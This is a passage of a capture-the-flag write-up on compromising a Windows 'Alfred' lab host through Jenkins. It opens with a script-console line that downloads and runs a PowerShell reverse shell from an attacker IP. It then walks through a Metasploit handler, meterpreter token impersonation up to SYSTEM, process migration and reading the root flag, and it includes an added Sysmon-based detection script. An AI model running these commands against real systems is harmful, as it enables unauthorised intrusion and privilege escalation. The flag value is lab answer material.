println "powershell iex (New-Object Net.WebClient).DownloadString(\'http://10.10.143.22:8081/Invoke-PowerShellTcp.ps1\');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.143.22 -Port 443".execute().text
METASPLOIT CONFIGURATION:
┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit
=[ metasploit v6.2.23-dev ]
+ -- --=[ 2259 exploits - 1188 auxiliary - 402 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services
Metasploit Documentation: https://docs.metasploit.com/
msf6 > set /multi/handler
/multi/handler =>
msf6 > options
Global Options:
===============
Option Current Setting Description
------ --------------- -----------
ConsoleLogging false Log all console input and output
LogLevel 0 Verbosity of logs (default 0, max 3)
MeterpreterPrompt meterpreter The meterpreter prompt string
MinimumRank 0 The minimum rank of exploits that will run without explicit confirmation
Prompt msf6 The prompt string
PromptChar > The prompt character
PromptTimeFormat %Y-%m-%d %H:%M:%S Format for timestamp escapes in prompts
SessionLogging false Log all input and output for sessions
SessionTlvLogging false Log all incoming and outgoing TLV packets
TimestampOutput false Prefix all console output with a timestamp
msf6 > back
msf6 > search multi handler
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence
1 exploit/android/local/janus 2017-07-31 manual Yes Android Janus APK Signature bypass
2 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
3 exploit/linux/local/bash_profile_persistence 1989-06-08 normal No Bash Profile Persistence
4 exploit/linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation
5 exploit/multi/handler manual No Generic Payload Handler
6 exploit/multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good No HP SiteScope Remote Code Execution
7 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow
8 exploit/windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
9 exploit/windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal No MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free
10 exploit/multi/http/maracms_upload_exec 2020-08-31 excellent Yes MaraCMS Arbitrary PHP File Upload
11 exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution
12 exploit/windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal
13 exploit/linux/http/rconfig_ajaxarchivefiles_rce 2020-03-11 good Yes Rconfig 3.x Chained Remote Code Execution
14 auxiliary/dos/http/webrick_regex 2008-08-08 normal No Ruby WEBrick::HTTP::DefaultFileHandler DoS
15 auxiliary/dos/http/squid_range_dos 2021-05-27 normal No Squid Proxy Range Header DoS
16 exploit/linux/http/trendmicro_websecurity_exec 2020-06-10 excellent Yes Trend Micro Web Security (Virtual Appliance) Remote Code Execution
17 exploit/multi/http/wp_ait_csv_rce 2020-11-14 excellent Yes WordPress AIT CSV Import Export Unauthenticated Remote Code Execution
18 exploit/linux/local/yum_package_manager_persistence 2003-12-17 excellent No Yum Package Manager Persistence
Interact with a module by name or index. For example info 18, use 18 or use exploit/linux/local/yum_package_manager_persistence
msf6 > use 5
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 10.10.143.22
LHOST => 10.10.143.22
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.143.22 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.143.22:4444
[*] Sending stage (175686 bytes) to 10.10.60.152
[*] Meterpreter session 1 opened (10.10.143.22:4444 -> 10.10.60.152:49204) at 2024-01-22 01:51:49 +0000
meterpreter >
We load the Meterpreter incognito extension with load so we can list the available tokens, among other things:
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > sysinfo
Computer : ALFRED
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\sppsvc
NT SERVICE\swprv
NT SERVICE\TrkWks
NT SERVICE\TrustedInstaller
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WinDefend
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv
Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\netprofm
NT SERVICE\nsi
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\W32Time
NT SERVICE\WdiServiceHost
NT SERVICE\WinHttpAutoProxySvc
NT SERVICE\wscsvc
We run impersonate_token to use the BUILTIN\Administrators delegation token we saw was available, and we obtain privilege elevation to NT AUTHORITY\SYSTEM. Things got tense:
meterpreter > getuid
Server username: alfred\bruce
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We then migrate to a process running as SYSTEM to make sure we hold full privileges: because of how the system handles tokens, we may not get complete privileges until we migrate into a process that is actually running as SYSTEM:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
396 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
468 2440 shell-paimon.exe x86 0 alfred\bruce C:\Program Files (x86)\Jenkins\shell-paimon.exe
524 516 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
572 564 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
580 516 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
608 564 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
668 580 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
676 580 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
684 580 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
712 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
772 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
848 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
920 608 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
936 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
988 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1012 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1016 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1064 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1208 668 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1236 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1340 668 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1396 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
1420 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1444 668 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1472 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1608 668 jenkins.exe x64 0 alfred\bruce C:\Program Files (x86)\Jenkins\jenkins.exe
1692 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1700 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1804 668 java.exe x86 0 alfred\bruce C:\Program Files (x86)\Jenkins\jre\bin\java.exe
1832 668 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1920 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
2288 1804 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2340 772 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
2440 1804 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2664 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
2720 668 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2980 668 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
3036 668 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
3064 2288 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
meterpreter > migrate 668
[*] Migrating from 468 to 668...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : ALFRED
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > guid
[+] Session GUID: 75f4399d-ba28-41ef-96bd-bca59d2c3d40
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
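From the defender's side, the two steps just shown (impersonating a token from the Jenkins service context, then migrating from shell-paimon.exe (PID 468) into services.exe (PID 668)) leave a recognisable trail in endpoint telemetry: the Jenkins JVM spawning PowerShell, and a non-Windows, non-SYSTEM process opening a remote thread in a core system process. The following is an added example, not code from the original write-up or from Metasploit/TryHackMe. The sample records are constructed to mirror the process tree above; the field names follow Sysmon's EventID 1 (ProcessCreate) and EventID 8 (CreateRemoteThread) conventions, and the lists of "core processes" and shell binaries are the author's own assumptions for the example.

```python
import ntpath
from typing import Iterable

# Constructed Sysmon-style records (assumption: not real events captured from the
# Alfred machine). EventID 1 = ProcessCreate, EventID 8 = CreateRemoteThread.
SAMPLE_EVENTS = [
    {"EventID": 1,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
     "User": r"alfred\bruce"},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 8,
     "SourceImage": r"C:\Program Files (x86)\Jenkins\shell-paimon.exe",
     "SourceUser": r"alfred\bruce",
     "TargetImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 8,
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "SourceUser": r"NT AUTHORITY\SYSTEM",
     "TargetImage": r"C:\Windows\System32\winlogon.exe"},
]

# Assumed install path of the CI server and the processes we treat as sensitive.
JENKINS_DIR = r"c:\program files (x86)\jenkins"
SHELLS = {"powershell.exe", "cmd.exe"}
CORE_PROCESSES = {"services.exe", "lsass.exe", "winlogon.exe", "csrss.exe", "wininit.exe"}
SYSTEM_ACCOUNT = r"nt authority\system"
WINDOWS_DIR = "c:\\windows\\"


def _base(path: str) -> str:
    """Case-folded file name of a Windows path."""
    return ntpath.basename(path).lower()


def jenkins_spawned_shell(ev: dict) -> bool:
    """ProcessCreate where the Jenkins JVM (java.exe under the Jenkins install
    directory) launches an interactive shell. A build server running PowerShell
    is what the script-console foothold looked like on the host."""
    if ev.get("EventID") != 1:
        return False
    parent = ev.get("ParentImage", "").lower()
    return (parent.startswith(JENKINS_DIR)
            and _base(parent) == "java.exe"
            and _base(ev.get("Image", "")) in SHELLS)


def remote_thread_into_core_process(ev: dict) -> bool:
    """CreateRemoteThread into a core Windows process from a source that is not
    itself a SYSTEM binary under C:\\Windows. Migrating a session from a user
    process into services.exe produces exactly this pairing."""
    if ev.get("EventID") != 8:
        return False
    if _base(ev.get("TargetImage", "")) not in CORE_PROCESSES:
        return False
    src = ev.get("SourceImage", "").lower()
    trusted_source = (src.startswith(WINDOWS_DIR)
                      and ev.get("SourceUser", "").lower() == SYSTEM_ACCOUNT)
    return not trusted_source


RULES = [jenkins_spawned_shell, remote_thread_into_core_process]


def scan(events: Iterable[dict]) -> list[tuple[str, str]]:
    """Return (rule_name, detail) for every event that matches a rule."""
    findings = []
    for ev in events:
        for rule in RULES:
            if rule(ev):
                who = ev.get("User") or ev.get("SourceUser", "?")
                what = ev.get("Image") or ev.get("SourceImage", "?")
                findings.append((rule.__name__, f"{who} via {_base(what)}"))
    return findings


if __name__ == "__main__":
    for name, detail in scan(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
```

On the constructed input the scan flags the java.exe -> powershell.exe launch and the shell-paimon.exe -> services.exe remote thread, and stays quiet on the two benign records. The more durable fix is not to run the Jenkins service under an account that holds impersonation privileges, and to keep the script console behind real credentials rather than admin:admin.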
We search for the root.txt flag and then drop into a regular shell to read it, and things got tense again:
meterpreter > search -f root.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Windows\System32\config\root.txt 70 2019-10-26 11:36:00 +0000
meterpreter > shell
Process 2876 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\Windows\System32\config\root.txt
type C:\Windows\System32\config\root.txt
dff0f748678f280250f25a45b8046b4a